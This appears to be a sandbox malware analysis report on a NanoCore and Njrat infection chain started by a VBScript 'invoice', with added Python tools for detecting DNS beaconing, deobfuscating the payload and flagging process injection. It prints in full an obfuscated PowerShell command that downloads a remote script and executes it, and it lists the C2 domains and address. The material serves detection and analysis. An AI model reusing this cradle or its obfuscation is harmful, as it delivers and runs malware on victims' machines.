Aug 3, 2021 20:41:55.571132898 CEST | 8.8.8.8 | 192.168.2.4 | 0x4f8d | No error (0) | newjan.duckdns.org | | 185.244.30.23 | A (IP address) | IN (0x0001)
Aug 3, 2021 20:42:02.657927990 CEST | 8.8.8.8 | 192.168.2.4 | 0x811f | No error (0) | newjan.duckdns.org | | 185.244.30.23 | A (IP address) | IN (0x0001)
Aug 3, 2021 20:42:09.430355072 CEST | 8.8.8.8 | 192.168.2.4 | 0xc9fa | No error (0) | newjan.duckdns.org | | 185.244.30.23 | A (IP address) | IN (0x0001)
Aug 3, 2021 20:42:16.363449097 CEST | 8.8.8.8 | 192.168.2.4 | 0x1b9e | No error (0) | newjan.duckdns.org | | 185.244.30.23 | A (IP address) | IN (0x0001)
Aug 3, 2021 20:42:23.439666986 CEST | 8.8.8.8 | 192.168.2.4 | 0xe0e7 | No error (0) | newjan.duckdns.org | | 185.244.30.23 | A (IP address) | IN (0x0001)
Aug 3, 2021 20:42:30.439749002 CEST | 8.8.8.8 | 192.168.2.4 | 0xdf8b | No error (0) | newjan.duckdns.org | | 185.244.30.23 | A (IP address) | IN (0x0001)
Aug 3, 2021 20:42:38.345422983 CEST | 8.8.8.8 | 192.168.2.4 | 0x1427 | No error (0) | newjan.duckdns.org | | 185.244.30.23 | A (IP address) | IN (0x0001)
Aug 3, 2021 20:42:45.580141068 CEST | 8.8.8.8 | 192.168.2.4 | 0xdec4 | No error (0) | newjan.duckdns.org | | 185.244.30.23 | A (IP address) | IN (0x0001)
Aug 3, 2021 20:42:52.634674072 CEST | 8.8.8.8 | 192.168.2.4 | 0x813e | No error (0) | newjan.duckdns.org | | 185.244.30.23 | A (IP address) | IN (0x0001)
Aug 3, 2021 20:42:59.691026926 CEST | 8.8.8.8 | 192.168.2.4 | 0xb3b4 | No error (0) | newjan.duckdns.org | | 185.244.30.23 | A (IP address) | IN (0x0001)
Aug 3, 2021 20:43:06.655194998 CEST | 8.8.8.8 | 192.168.2.4 | 0xd94d | No error (0) | newjan.duckdns.org | | 185.244.30.23 | A (IP address) | IN (0x0001)
Aug 3, 2021 20:43:12.760323048 CEST | 8.8.8.8 | 192.168.2.4 | 0xc508 | No error (0) | dangomra.duckdns.org | | 185.244.30.23 | A (IP address) | IN (0x0001)
Aug 3, 2021 20:43:12.868308067 CEST | 8.8.8.8 | 192.168.2.4 | 0x2379 | No error (0) | newjan.duckdns.org | | 185.244.30.23 | A (IP address) | IN (0x0001)
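The DNS Answers table above is the clearest network indicator in this report: both duckdns.org names resolve to 185.244.30.23, and newjan.duckdns.org is re-resolved roughly every seven seconds while the injected aspnet_compiler.exe tries to reach its C2. The script below is an added example, not part of the Joe Sandbox report; its input rows are copied from the table above, and the dynamic-DNS zone list is a small starter set to be extended from your own intel.

```python
"""Detect C2 beaconing in a list of DNS answers.

Added example; it is not part of the Joe Sandbox report. The rows in
DNS_ANSWERS are copied from the report's DNS Answers table (timestamp, name,
address). Three checks are applied: names under a dynamic-DNS provider, one
name re-resolved at a near-constant interval, and several names sharing one
address."""

from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, pstdev

DNS_ANSWERS = [
    ("Aug 3, 2021 20:39:15.974540949 CEST", "ia601405.us.archive.org", "207.241.227.125"),
    ("Aug 3, 2021 20:39:39.330821991 CEST", "ia801408.us.archive.org", "207.241.228.148"),
    ("Aug 3, 2021 20:41:48.751724005 CEST", "newjan.duckdns.org", "185.244.30.23"),
    ("Aug 3, 2021 20:41:55.571132898 CEST", "newjan.duckdns.org", "185.244.30.23"),
    ("Aug 3, 2021 20:42:02.657927990 CEST", "newjan.duckdns.org", "185.244.30.23"),
    ("Aug 3, 2021 20:42:09.430355072 CEST", "newjan.duckdns.org", "185.244.30.23"),
    ("Aug 3, 2021 20:42:16.363449097 CEST", "newjan.duckdns.org", "185.244.30.23"),
    ("Aug 3, 2021 20:42:23.439666986 CEST", "newjan.duckdns.org", "185.244.30.23"),
    ("Aug 3, 2021 20:42:30.439749002 CEST", "newjan.duckdns.org", "185.244.30.23"),
    ("Aug 3, 2021 20:42:38.345422983 CEST", "newjan.duckdns.org", "185.244.30.23"),
    ("Aug 3, 2021 20:42:45.580141068 CEST", "newjan.duckdns.org", "185.244.30.23"),
    ("Aug 3, 2021 20:42:52.634674072 CEST", "newjan.duckdns.org", "185.244.30.23"),
    ("Aug 3, 2021 20:42:59.691026926 CEST", "newjan.duckdns.org", "185.244.30.23"),
    ("Aug 3, 2021 20:43:06.655194998 CEST", "newjan.duckdns.org", "185.244.30.23"),
    ("Aug 3, 2021 20:43:12.760323048 CEST", "dangomra.duckdns.org", "185.244.30.23"),
    ("Aug 3, 2021 20:43:12.868308067 CEST", "newjan.duckdns.org", "185.244.30.23"),
]

# Starter list of dynamic-DNS zones (assumed subset); extend from intel feeds.
DYNAMIC_DNS_SUFFIXES = (".duckdns.org", ".no-ip.org", ".ddns.net", ".hopto.org")

MIN_LOOKUPS = 4      # fewer samples cannot establish a cadence
MAX_JITTER = 0.25    # pstdev/mean above this is not a fixed timer


def parse_ts(s):
    """Parse 'Mon D, YYYY HH:MM:SS.nnnnnnnnn TZ'. The zone is dropped because
    only differences are used and every row carries the same zone."""
    head, frac = s.rsplit(" ", 1)[0].rsplit(".", 1)
    dt = datetime.strptime(head, "%b %d, %Y %H:%M:%S")
    return dt + timedelta(microseconds=int(frac[:6].ljust(6, "0")))


def analyze(rows):
    """Return dynamic-DNS names, beaconing names with their period in seconds,
    and addresses shared by more than one name."""
    by_name = defaultdict(list)
    by_addr = defaultdict(set)
    for ts, name, addr in rows:
        by_name[name].append(parse_ts(ts))
        by_addr[addr].add(name)

    dynamic = {n for n in by_name if n.endswith(DYNAMIC_DNS_SUFFIXES)}

    beacons = {}
    for name, stamps in by_name.items():
        if len(stamps) < MIN_LOOKUPS:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        period = mean(gaps)
        if period > 0 and pstdev(gaps) / period <= MAX_JITTER:
            beacons[name] = round(period, 2)

    shared = {a: sorted(n) for a, n in by_addr.items() if len(n) > 1}
    return {"dynamic_dns": dynamic, "beacons": beacons, "shared_address": shared}


if __name__ == "__main__":
    for key, value in analyze(DNS_ANSWERS).items():
        print(f"{key}: {value}")
```

The two archive.org names are looked up once each and never trip the cadence check, which is the point of requiring a minimum sample count: a staging download looks nothing like a C2 timer. The jitter bound is deliberately loose because NanoCore's retry loop is not perfectly regular (the gaps here range from about 6.2 s to 7.9 s).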

                                                                            HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Aug 3, 2021 20:39:16.366322994 CEST | 207.241.227.125 | 443 | 192.168.2.4 | 49746 | 769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0 | 54328bd36c14bd82ddaa0c04b25ed9ad
Certificate chain (Subject | Issuer | Not Before | Not After):
CN=*.us.archive.org, OU=Domain Control Validated | CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Mon Dec 23 14:16:32 CET 2019 | Mon Feb 21 23:56:17 CET 2022
CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Tue May 03 09:00:00 CEST 2011 | Sat May 03 09:00:00 CEST 2031
CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | Wed Jan 01 08:00:00 CET 2014 | Fri May 30 09:00:00 CEST 2031
OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | Tue Jun 29 19:06:20 CEST 2004 | Thu Jun 29 19:06:20 CEST 2034

Aug 3, 2021 20:39:39.694905043 CEST | 207.241.228.148 | 443 | 192.168.2.4 | 49756 | 769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0 | 54328bd36c14bd82ddaa0c04b25ed9ad
Certificate chain (Subject | Issuer | Not Before | Not After):
CN=*.us.archive.org, OU=Domain Control Validated | CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Mon Dec 23 14:16:32 CET 2019 | Mon Feb 21 23:56:17 CET 2022
CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Tue May 03 09:00:00 CEST 2011 | Sat May 03 09:00:00 CEST 2031
CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | Wed Jan 01 08:00:00 CET 2014 | Fri May 30 09:00:00 CEST 2031
OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | Tue Jun 29 19:06:20 CEST 2004 | Thu Jun 29 19:06:20 CEST 2034

                                                                            Behavior

                                                                            System Behavior

                                                                            General

                                                                            Start time:20:39:09
                                                                            Start date:03/08/2021
                                                                            Path:C:\Windows\System32\wscript.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\3G1J49A6V_Invoice.vbs'
                                                                            Imagebase:0x7ff7cf0c0000
                                                                            File size:163840 bytes
                                                                            MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000002.652005586.000002534BC55000.00000004.00000040.sdmp, Author: Florian Roth
                                                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.651067855.000002534BC5B000.00000004.00000001.sdmp, Author: Florian Roth
                                                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000002.652059892.000002534D420000.00000004.00000001.sdmp, Author: Florian Roth
                                                                            Reputation:high

                                                                            General

                                                                            Start time:20:39:11
                                                                            Start date:03/08/2021
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');
                                                                            Imagebase:0x7ff7bedd0000
                                                                            File size:447488 bytes
                                                                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Reputation:high
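
The command line above is the sample's whole first stage: three seed strings are rebuilt with chained .Replace() calls, backticks split the resulting keywords so no recognisable token appears in the script, and `&('I'+'EX')` invokes Invoke-Expression on the assembled text, whose output is piped into a second Invoke-Expression that runs whatever ALL.txt returns. The Python below is an added example, not part of the report; it replays the Replace chains exactly as .NET does (ordinal, case-sensitive, left to right) and drops the backtick escapes, so the real command can be read without running it.

```python
"""Replay the string-Replace obfuscation of the captured PowerShell command.

Added example, not part of the Joe Sandbox report. The seed strings and
Replace() chains are copied verbatim from the powershell.exe command line;
nothing here executes PowerShell."""

import re

# Copied from the captured command line.
TRUMP = "https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt"

B_SEED = "ETH COINt.WTF COINlIOSNT"
B_CHAIN = [("ETH COIN", "nE"), ("TF COIN", "EbC"), ("OS", "e")]

CC_SEED = "DOS COIN LSOSCOINnG"
CC_CHAIN = [("S COIN ", "Wn"), ("SO", "oaD"), ("COIN", "TrI")]

A_SEED = "I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)"
A_CHAIN = [("os COIN", "X(n`e"), ("BTC COIN", "-Ob"), ("TH COIN", "`c`T")]


def apply_replace_chain(seed, chain):
    """Apply .Replace(old, new) calls in order. Python's str.replace is
    ordinal and case-sensitive, the same as the .NET overload used here."""
    s = seed
    for old, new in chain:
        s = s.replace(old, new)
    return s


def strip_backticks(code):
    """Outside quotes PowerShell reads `x as an escaped x, so I`EX and
    n`e`W`-Obj`E`c`T are parsed as IEX and neW-ObjEcT."""
    return re.sub(r"`(.)", r"\1", code)


def deobfuscate():
    """Return each rebuilt fragment and the script the first IEX receives,
    with $B, $CC and $TRUMP expanded the way the interpreter would."""
    b = apply_replace_chain(B_SEED, B_CHAIN)      # nEt.WEbClIeNT
    cc = apply_replace_chain(CC_SEED, CC_CHAIN)   # DOWnLoaDSTrInG
    a = strip_backticks(apply_replace_chain(A_SEED, A_CHAIN))
    stage1 = a.replace("$B", b).replace("$CC", cc).replace("$TRUMP", f"'{TRUMP}'")
    return {"B": b, "CC": cc, "A": a, "stage1": stage1}


if __name__ == "__main__":
    for key, value in deobfuscate().items():
        print(f"{key:7} = {value}")
```

Case-insensitive comparison is the right way to match the output against detection content: the recovered script is `IEX(neW-ObjEcT nEt.WEbClIeNT).DOWnLoaDSTrInG(...)`, and the mixed case is what the PowerShell_Case_Anomaly Yara rule listed for the wscript.exe process is keyed on. The same replay covers any later sample that only swaps the seed strings and markers.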

                                                                            General

                                                                            Start time:20:39:11
                                                                            Start date:03/08/2021
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff724c50000
                                                                            File size:625664 bytes
                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            General

                                                                            Start time:20:41:43
                                                                            Start date:03/08/2021
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                            Imagebase:0x230000
                                                                            File size:55400 bytes
                                                                            MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate

                                                                            General

                                                                            Start time:20:41:44
                                                                            Start date:03/08/2021
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                            Imagebase:0x4f0000
                                                                            File size:55400 bytes
                                                                            MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Yara matches:
                                                                            • Rule: NanoCore, Description: unknown, Source: 00000014.00000002.1178034772.0000000003B0C000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000002.1175964065.0000000003813000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000002.1170915770.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000002.1170915770.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: NanoCore, Description: unknown, Source: 00000014.00000002.1170915770.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000002.1173629355.00000000027C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000002.1173893063.000000000282D000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: NanoCore, Description: unknown, Source: 00000014.00000002.1173893063.000000000282D000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                            Reputation:moderate

                                                                            General

                                                                            Start time:20:42:58
                                                                            Start date:03/08/2021
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                            Imagebase:0x130000
                                                                            File size:55400 bytes
                                                                            MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate

                                                                            General

                                                                            Start time:20:42:59
                                                                            Start date:03/08/2021
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                            Imagebase:0xa10000
                                                                            File size:55400 bytes
                                                                            MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Yara matches:
                                                                            • Rule: Njrat, Description: detect njRAT in memory, Source: 00000016.00000002.1171008020.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:moderate
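
The process list above is the whole chain: wscript.exe runs the .vbs, spawns the obfuscated powershell.exe, and aspnet_compiler.exe, a .NET Framework build tool that has no reason to start with an empty command line, is launched twice as the host for the injected NanoCore and Njrat payloads (the Yara matches sit in those processes, not in any file on disk). The rules below are an added example and not part of the report; image paths and command lines are the report's own, while the PIDs and parent links are assumed, since this section lists the processes but does not show the tree.

```python
"""Detection rules for the process chain listed under System Behavior.

Added example, not part of the Joe Sandbox report. Image paths and command
lines are copied from the report; PIDs and parent links are assumed. The
rules restate the report's "Wscript starts Powershell" and "Obfuscated
command line found" signatures and add a check for a .NET Framework utility
started without arguments, the injection target seen here."""

import re
from pathlib import PureWindowsPath

POWERSHELL_CMD = (
    r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' "
    r"$TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';"
    r"$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');"
    r"$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');"
    r"$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');"
    r"&('I'+'EX')($A -Join '')|&('I'+'EX');"
)

# (pid, ppid, image, command line); pid and ppid values are assumed.
PROCESSES = [
    (1000, 900, r"C:\Windows\System32\wscript.exe",
     r"C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\3G1J49A6V_Invoice.vbs'"),
    (1010, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", POWERSHELL_CMD),
    (1011, 1010, r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    (1020, 1010, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe",
     r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"),
    (1030, 1010, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe",
     r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
DOTNET_DIR = re.compile(r"\\Microsoft\.NET\\Framework(64)?\\v[\d.]+\\", re.I)
# Markers of string-assembly obfuscation: chained .Replace(), a command built
# from concatenated literals (&('I'+'EX')), and a backtick inside a bare word.
REPLACE_CALL = re.compile(r"\.Replace\(", re.I)
CONCAT_INVOKE = re.compile(r"&\s*\(\s*'[^']*'\s*\+\s*'[^']*'\s*\)")
BACKTICK_WORD = re.compile(r"[A-Za-z]`[A-Za-z]")


def basename(path):
    return PureWindowsPath(path).name.lower()


def obfuscation_score(cmdline):
    """0 for ordinary command lines; the captured one scores 6."""
    return (min(len(REPLACE_CALL.findall(cmdline)), 3)
            + 2 * bool(CONCAT_INVOKE.search(cmdline))
            + bool(BACKTICK_WORD.search(cmdline)))


def run_rules(processes):
    """Return (rule name, pid) pairs for every process that trips a rule."""
    images = {pid: image for pid, _, image, _ in processes}
    alerts = []
    for pid, ppid, image, cmdline in processes:
        name = basename(image)
        parent = basename(images.get(ppid, ""))
        if parent in SCRIPT_HOSTS and name == "powershell.exe":
            alerts.append(("script_host_spawns_powershell", pid))
        if name == "powershell.exe" and obfuscation_score(cmdline) >= 4:
            alerts.append(("obfuscated_powershell_cmdline", pid))
        # A build tool started with nothing but its own path does no work of
        # its own; it is a hollow host for code written in by the parent.
        if DOTNET_DIR.search(image) and cmdline.strip().strip('"') == image:
            alerts.append(("dotnet_framework_tool_without_args", pid))
    return alerts


if __name__ == "__main__":
    for rule, pid in run_rules(PROCESSES):
        print(f"{rule}: pid {pid}")
```

The third rule is the one worth carrying into production telemetry: it needs only the image path and command line from a process-creation event, it fires on the first aspnet_compiler.exe before any Yara hit is possible, and it generalises to the other Framework utilities (RegAsm, RegSvcs, MSBuild and the like) that loaders pick as injection targets. Treat a hit as an injection lead rather than proof, and pair it with the parent image: a .NET tool started bare by powershell.exe or wscript.exe is far more suspicious than one started by Visual Studio.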
